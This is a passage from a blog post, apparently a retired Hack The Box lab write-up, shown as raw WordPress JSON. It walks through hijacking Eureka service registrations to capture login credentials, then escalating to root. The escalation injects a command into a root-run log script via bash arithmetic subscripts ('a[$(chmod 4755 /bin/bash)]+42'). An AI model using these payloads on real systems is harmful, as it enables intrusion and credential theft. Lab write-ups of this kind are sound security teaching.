class=\"language-plain\">HTTP\/1.1 200 OK\nContent-Type: text\/html\nContent-Length: 38\n\n&lt;script&gt;alert(\"misaka19008\");&lt;\/script&gt;<\/code><\/pre>\n<p>Once that is written, use <code>netcat<\/code> to listen on port <code>80<\/code>, redirecting the contents of <code>response_heartbeat.data<\/code> to its input stream:<\/p>\n<pre><code class=\"language-shell\">nc -l -p 80 -s 10.10.14.2 &lt; 
response_heartbeat.data<\/code><\/pre>\n<p>Then use <code>curl<\/code> to send the malicious instance registration request to the <code>\/eureka\/apps\/FURNI<\/code> endpoint:<\/p>\n<pre><code class=\"language-shell\">curl -v http:\/\/furni.htb:8761\/eureka\/apps\/FURNI -X POST -d @evil-instance.json -H \"Content-Type: application\/json\" -H \"Authorization: Basic RXVyZWthU3J2cjowc2NhclBXRGlzVGhlQjNzdA==\"<\/code><\/pre>\n<p>Next, in the same way, add malicious instances to the <code>APP-GATEWAY<\/code> and <code>USER-MANAGEMENT-SERVICE<\/code> applications:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746151364552-067f1dd6-dddd-4c65-92d7-e82f21ba90cd.png\" alt=\"\" \/><\/p>\n<p>Finally, refresh the home page of the <code>Spring Cloud Eureka<\/code> dashboard:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746155861399-5dd63875-78a2-4e4c-8dc5-ab5e33b76f2a.png\" alt=\"\" \/><\/p>\n<p>The malicious instances were registered successfully. After a short wait, the login request had been hijacked:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746155913271-8df6154c-7260-4a9a-8329-2feb0b577e6d.png\" alt=\"\" \/><\/p>\n<p>The following login credentials were found:<\/p>\n<ul>\n<li>Username: <code>miranda@furni.htb<\/code>, <code>miranda-wise<\/code><\/li>\n<li>Password: <code>IL!veT0Be&amp;BeT0L0ve<\/code><\/li>\n<\/ul>\n<p>Try logging in over <code>SSH<\/code>:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746156132842-f5a36619-247f-4712-b005-1ce5f11b62dd.png\" alt=\"\" 
\/><\/p>\n<p><strong>Success!!<\/strong><\/p>\n<h2>Exploiting the comparison operator vulnerability in the scheduled script<\/h2>\n<p>After logging in as <code>miranda-wise<\/code> and enumerating directories again, the current user turns out to be in the <code>developers<\/code> group. The directories <code>\/var\/www\/web\/cloud-gateway\/log\/<\/code> and <code>\/var\/www\/web\/user-management-service\/log\/<\/code>, which hold the two <code>Web<\/code> service log files <code>application.log<\/code>, also have <code>developers<\/code> as their <code>GID<\/code>, with mode <code>775<\/code>. This means we can <strong>delete and then recreate<\/strong> the two log files, which has the effect of modifying them:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746159414663-68d717d7-ad54-43e3-90b9-58ca52905fca.png\" alt=\"\" \/><\/p>\n<p>From the operating system enumeration results, every time the <code>root<\/code> user runs <code>curl<\/code> to perform the login operation, it then calls the <code>\/opt\/log_analyse.sh<\/code> script to process the two <code>Web<\/code> application logs. The scheduled script <code>log_analyse.sh<\/code> is therefore judged to be a major privilege escalation vector, and its code is audited below:<\/p>\n<pre><code class=\"language-bash\">\n#!\/bin\/bash\n\n# 
Colors\nGREEN=&#39;\\033[0;32m&#39;\nRED=&#39;\\033[0;31m&#39;\nYELLOW=&#39;\\033[1;33m&#39;\nBLUE=&#39;\\033[0;34m&#39;\nCYAN=&#39;\\033[0;36m&#39;\nRESET=&#39;\\033[0m&#39;\n\nLOG_FILE=&quot;$1&quot;\nOUTPUT_FILE=&quot;log_analysis.txt&quot;\n\ndeclare -A successful_users  # Associative array: username -&gt; count\ndeclare -A failed_users      # Associative array: username -&gt; count\nSTATUS_CODES=(&quot;200:0&quot; &quot;201:0&quot; &quot;302:0&quot; &quot;400:0&quot; &quot;401:0&quot; &quot;403:0&quot; &quot;404:0&quot; &quot;500:0&quot;) # Indexed array: &quot;code:count&quot; pairs\n\nif [ ! -f &quot;$LOG_FILE&quot; ]; then\n    echo -e &quot;${RED}Error: Log file $LOG_FILE not found.${RESET}&quot;\n    exit 1\nfi\n\n\nanalyze_logins() {\n    # Process successful logins\n    while IFS= read -r line; do\n        username=$(echo &quot;$line&quot; | awk -F&quot;&#39;&quot; &#39;{print $2}&#39;)\n        if [ -n &quot;${successful_users[$username]+_}&quot; ]; then\n            successful_users[$username]=$((successful_users[$username] + 1))\n        else\n            successful_users[$username]=1\n        fi\n    done &lt; &lt;(grep &quot;LoginSuccessLogger&quot; &quot;$LOG_FILE&quot;)\n\n    # Process failed logins\n    while IFS= read -r line; do\n        username=$(echo &quot;$line&quot; | awk -F&quot;&#39;&quot; &#39;{print $2}&#39;)\n        if [ -n &quot;${failed_users[$username]+_}&quot; ]; then\n            failed_users[$username]=$((failed_users[$username] + 1))\n        else\n            failed_users[$username]=1\n        fi\n    done &lt; &lt;(grep &quot;LoginFailureLogger&quot; &quot;$LOG_FILE&quot;)\n}\n\n\nanalyze_http_statuses() {\n    # Process HTTP status codes\n    while IFS= read -r line; do\n        code=$(echo &quot;$line&quot; | grep -oP &#39;Status: \\K.*&#39;)\n        found=0\n        # Check if code exists in STATUS_CODES array\n        for i in &quot;${!STATUS_CODES[@]}&quot;; do\n            
existing_entry=&quot;${STATUS_CODES[$i]}&quot;\n            existing_code=$(echo &quot;$existing_entry&quot; | cut -d&#39;:&#39; -f1)\n            existing_count=$(echo &quot;$existing_entry&quot; | cut -d&#39;:&#39; -f2)\n            if [[ &quot;$existing_code&quot; -eq &quot;$code&quot; ]]; then\n                new_count=$((existing_count + 1))\n                STATUS_CODES[$i]=&quot;${existing_code}:${new_count}&quot;\n                break\n            fi\n        done\n    done &lt; &lt;(grep &quot;HTTP.*Status: &quot; &quot;$LOG_FILE&quot;)\n}\n\n\nanalyze_log_errors(){\n     # Log Level Counts (colored)\n    echo -e &quot;\\n${YELLOW}[+] Log Level Counts:${RESET}&quot;\n    log_levels=$(grep -oP &#39;(?&lt;=Z  )\\w+&#39; &quot;$LOG_FILE&quot; | sort | uniq -c)\n    echo &quot;$log_levels&quot; | awk -v blue=&quot;$BLUE&quot; -v yellow=&quot;$YELLOW&quot; -v red=&quot;$RED&quot; -v reset=&quot;$RESET&quot; &#39;{\n        if ($2 == &quot;INFO&quot;) color=blue;\n        else if ($2 == &quot;WARN&quot;) color=yellow;\n        else if ($2 == &quot;ERROR&quot;) color=red;\n        else color=reset;\n        printf &quot;%s%6s %s%s\\n&quot;, color, $1, $2, reset\n    }&#39;\n\n    # ERROR Messages\n    error_messages=$(grep &#39; ERROR &#39; &quot;$LOG_FILE&quot; | awk -F&#39; ERROR &#39; &#39;{print $2}&#39;)\n    echo -e &quot;\\n${RED}[+] ERROR Messages:${RESET}&quot;\n    echo &quot;$error_messages&quot; | awk -v red=&quot;$RED&quot; -v reset=&quot;$RESET&quot; &#39;{print red $0 reset}&#39;\n\n    # Eureka Errors\n    eureka_errors=$(grep &#39;Connect to http:\/\/localhost:8761.*failed: Connection refused&#39; &quot;$LOG_FILE&quot;)\n    eureka_count=$(echo &quot;$eureka_errors&quot; | wc -l)\n    echo -e &quot;\\n${YELLOW}[+] Eureka Connection Failures:${RESET}&quot;\n    echo -e &quot;${YELLOW}Count: $eureka_count${RESET}&quot;\n    echo &quot;$eureka_errors&quot; | tail -n 2 | awk -v yellow=&quot;$YELLOW&quot; -v reset=&quot;$RESET&quot; &#39;{print 
yellow $0 reset}&#39;\n}\n\n\ndisplay_results() {\n    echo -e &quot;${BLUE}----- Log Analysis Report -----${RESET}&quot;\n\n    # Successful logins\n    echo -e &quot;\\n${GREEN}[+] Successful Login Counts:${RESET}&quot;\n    total_success=0\n    for user in &quot;${!successful_users[@]}&quot;; do\n        count=${successful_users[$user]}\n        printf &quot;${GREEN}%6s %s${RESET}\\n&quot; &quot;$count&quot; &quot;$user&quot;\n        total_success=$((total_success + count))\n    done\n    echo -e &quot;${GREEN}\\nTotal Successful Logins: $total_success${RESET}&quot;\n\n    # Failed logins\n    echo -e &quot;\\n${RED}[+] Failed Login Attempts:${RESET}&quot;\n    total_failed=0\n    for user in &quot;${!failed_users[@]}&quot;; do\n        count=${failed_users[$user]}\n        printf &quot;${RED}%6s %s${RESET}\\n&quot; &quot;$count&quot; &quot;$user&quot;\n        total_failed=$((total_failed + count))\n    done\n    echo -e &quot;${RED}\\nTotal Failed Login Attempts: $total_failed${RESET}&quot;\n\n    # HTTP status codes\n    echo -e &quot;\\n${CYAN}[+] HTTP Status Code Distribution:${RESET}&quot;\n    total_requests=0\n    # Sort codes numerically\n    IFS=$&#39;\\n&#39; sorted=($(sort -n -t&#39;:&#39; -k1 &lt;&lt;&lt;&quot;${STATUS_CODES[*]}&quot;))\n    unset IFS\n    for entry in &quot;${sorted[@]}&quot;; do\n        code=$(echo &quot;$entry&quot; | cut -d&#39;:&#39; -f1)\n        count=$(echo &quot;$entry&quot; | cut -d&#39;:&#39; -f2)\n        total_requests=$((total_requests + count))\n        \n        # Color coding\n        if [[ $code =~ ^2 ]]; then color=&quot;$GREEN&quot;\n        elif [[ $code =~ ^3 ]]; then color=&quot;$YELLOW&quot;\n        elif [[ $code =~ ^4 || $code =~ ^5 ]]; then color=&quot;$RED&quot;\n        else color=&quot;$CYAN&quot;\n        fi\n        \n        printf &quot;${color}%6s %s${RESET}\\n&quot; &quot;$count&quot; &quot;$code&quot;\n    done\n    echo -e &quot;${CYAN}\\nTotal HTTP Requests Tracked: 
$total_requests${RESET}&quot;\n}\n\n\n# Main execution\nanalyze_logins\nanalyze_http_statuses\ndisplay_results | tee &quot;$OUTPUT_FILE&quot;\nanalyze_log_errors | tee -a &quot;$OUTPUT_FILE&quot;\necho -e &quot;\\n${GREEN}Analysis completed. Results saved to $OUTPUT_FILE${RESET}&quot;\n<\/code><\/pre>\n<p>The main job of this script is to tally the user login records and status codes found in the log, and it is implemented in <code>4<\/code> functions, which are analyzed one by one below.<\/p>\n<p>First, the <code>analyze_logins()<\/code> function: it uses the <code>grep<\/code> command to feed the log lines containing the string <code>LoginSuccessLogger<\/code> into the loop that processes the log. The loop uses the <code>awk<\/code> command to split each incoming line on the <code>'<\/code> character and returns the second element of the resulting array (the username). It then checks whether that user is already recorded in the <code>successful_users<\/code> array: if not, it creates a new element for the user, and if so, it increments the success count by <code>1<\/code>. Users with failed logins are handled the same way. Because the incoming line <code>line<\/code> and the <code>username<\/code> variable are both wrapped in quotes, no exploitable point was found here.<\/p>\n<p>Next, the <code>analyze_http_statuses()<\/code> function: it first uses the <co
de>grep<\/code> command to feed the log lines containing the string <code>HTTP Status<\/code> into a loop. The loop then uses the <code>grep<\/code> command again to extract the numeric <code>HTTP<\/code> status code that follows <code>HTTP Status:<\/code> and assigns it to the <code>code<\/code> variable. It then iterates over the <code>STATUS_CODES<\/code> array, <strong><span style=\"color: #df2a3f; background-color: #fbde28;\">using the -eq<\/span><\/strong><strong><span style=\"color: #df2a3f; background-color: #fbde28;\"> numeric operator to compare that status code with the predefined status codes<\/span><\/strong><span style=\"background-color: rgba(255, 255, 255, 0);\">, and this is where the vulnerability appears.<\/span><\/p>\n<p><span style=\"background-color: rgba(255, 255, 255, 0);\">In <\/span><code>Linux Bash<\/code><span style=\"background-color: rgba(255, 255, 255, 0);\">, the <\/span><code>-eq<\/code><span style=\"background-color: rgba(255, 255, 255, 0);\"> operator is used to <\/span><strong><span style=\"background-color: rgba(255, 255, 255, 0);\">test whether two numbers are equal<\/span><\/strong><span style=\"background-color: rgba(255, 255, 255, 0);\">. It is used as follows:<\/span><\/p>\n<pre><code class=\"language-bash\">#!\/bin\/bash\nread -rp \"Enter guess: \" num\nif [[ $num -eq 42 ]]\nthen\n  echo \"Correct\"\nelse\n  echo \"Wrong\"\nfi<\/code><\/pre>\n<p><span style=\"background-color: rgba(255, 255, 255, 0);\">Clearly, in the normal case, if we enter <\/span><code>42<\/code><span style=\"background-color: rgba(255, 255, 255, 
0);\">, the script prints <\/span><code>Correct<\/code><span style=\"background-color: rgba(255, 255, 255, 0);\">; otherwise it prints <\/span><code>Wrong<\/code><span style=\"background-color: rgba(255, 255, 255, 0);\">. If we try to enter a command substitution, the script exits with an error:<\/span><\/p>\n<pre><code class=\"language-plain\">.\/test.sh: \u884c 3: [[: $(id): \u8bed\u6cd5\u9519\u8bef\uff1a\u9700\u8981\u64cd\u4f5c\u6570\uff08\u9519\u8bef\u8bb0\u53f7\u662f \"$(id)\"\uff09<\/code><\/pre>\n<p><span style=\"background-color: rgba(255, 255, 255, 0);\">Here, because <\/span><code>Linux Bash<\/code><span style=\"background-color: rgba(255, 255, 255, 0);\"> is a scripting language, the script does not compare a plain number or string with the operand <\/span><code>42<\/code><span style=\"background-color: rgba(255, 255, 255, 0);\">; it compares a <\/span><code>Shell<\/code><span style=\"background-color: rgba(255, 255, 255, 0);\"> object built from the user input with <\/span><code>42<\/code><span style=\"background-color: rgba(255, 255, 255, 0);\"> (inside [[ ]], each operand of -eq is evaluated as an arithmetic expression), so the script raises an error. If we enter the string <\/span><code>test<\/code><span style=\"background-color: rgba(255, 255, 255, 0);\"> instead, the script prints <\/span><code>Wrong<\/code><span style=\"background-color: rgba(255, 255, 255, 0);\"> and exits rather than raising an error.<\/span><\/p>\n<p><span style=\"background-color: rgba(255, 255, 255, 0);\">In this situation, arbitrary commands can be executed by means of a <\/span><code>Shell<\/code><strong><span style=\"background-color: rgba(255, 255, 255, 
0);\"> array subscript<\/span><\/strong><span style=\"background-color: rgba(255, 255, 255, 0);\">. For example, we can enter the following array element expression:<\/span><\/p>\n<pre><code class=\"language-plain\">a[$(screenfetch &gt;&amp;2)]+42<\/code><\/pre>\n<p>In that case, the comparison statement that is actually executed is:<\/p>\n<pre><code class=\"language-bash\">if [[ a[$(screenfetch &gt;&amp;2)]+42 -eq 42 ]]<\/code><\/pre>\n<p>Here <code>a[$(screenfetch &gt;&amp;2)]+42<\/code> is a valid numeric expression. The <code>Bash<\/code> interpreter first runs the command inside the <code>$()<\/code> command substitution to obtain the array subscript, then uses that subscript to access the array <code>a<\/code> and tries to fetch the corresponding element. However, once the command constructed by the attacker has been executed, it no longer matters whether the rest of the script runs normally:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746162661162-258f7c3c-aed1-4736-8693-6aa7df7d670c.png\" alt=\"\" \/><\/p>\n<p>Back to the scheduled script on the target: since <code>analyze_http_statuses()<\/code> only extracts the content after <code>HTTP 
Status:<\/code> and compares it, repeatedly deleting and recreating the log file in a <code>while<\/code> loop is enough to trigger the command execution vulnerability. The log file only needs the following content:<\/p>\n<pre><code class=\"language-plain\">HTTP Status: a[$(chmod 4755 \/bin\/bash &gt;&amp;2)]+42<\/code><\/pre>\n<p>The following command deletes and rewrites the log file in a loop:<\/p>\n<pre><code class=\"language-shell\">while true; do rm -rf \/var\/www\/web\/cloud-gateway\/log\/application.log; echo \"HTTP Status: a[$(chmod 4755 \/bin\/bash &gt;&amp;2)]+42\" &gt; \/var\/www\/web\/cloud-gateway\/log\/application.log; done;<\/code><\/pre>\n<p>After waiting a while, stop the command and check the permissions of <code>\/bin\/bash<\/code>:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746163755746-20e3aa0c-8f1c-476d-8deb-f2797ca783c2.png\" alt=\"\" \/><\/p>\n<p>The <code>chmod<\/code> command was executed successfully! Now run the following commands to change the <code>root<\/code> password:<\/p>\n<pre><code class=\"language-shell\">\/bin\/bash -p\npython3 -c \"import os;os.setuid(0);os.setgid(0);os.system(\"echo 'Asd310056nAsd310056' | passwd root\")\"<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746164003488-1a9b2849-a31b-49c7-b9ab-47234fa219ec.png\" alt=\"\" \/><\/p>\n<p><strong>Privilege escalation succeeded!!!!<\/strong><\/p>\n<hr \/>\n<h1>This concludes the penetration test of this target machine<\/h1>\n<hr \/>\n","protected":false},"excerpt":{"rendered":"<p>Target information 
IP address: 10.10.11.66 (multiple IP addresses exist) Information gathering ICMP check PING 10.129.103.58 (1 &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[3,14],"tags":[],"class_list":["post-259","post","type-post","status-publish","format-standard","hentry","category-htb_retired","category-linux_machines"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/259","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=259"}],"version-history":[{"count":8,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/259\/revisions"}],"predecessor-version":[{"id":267,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/259\/revisions\/267"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=259"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=259"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=259"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}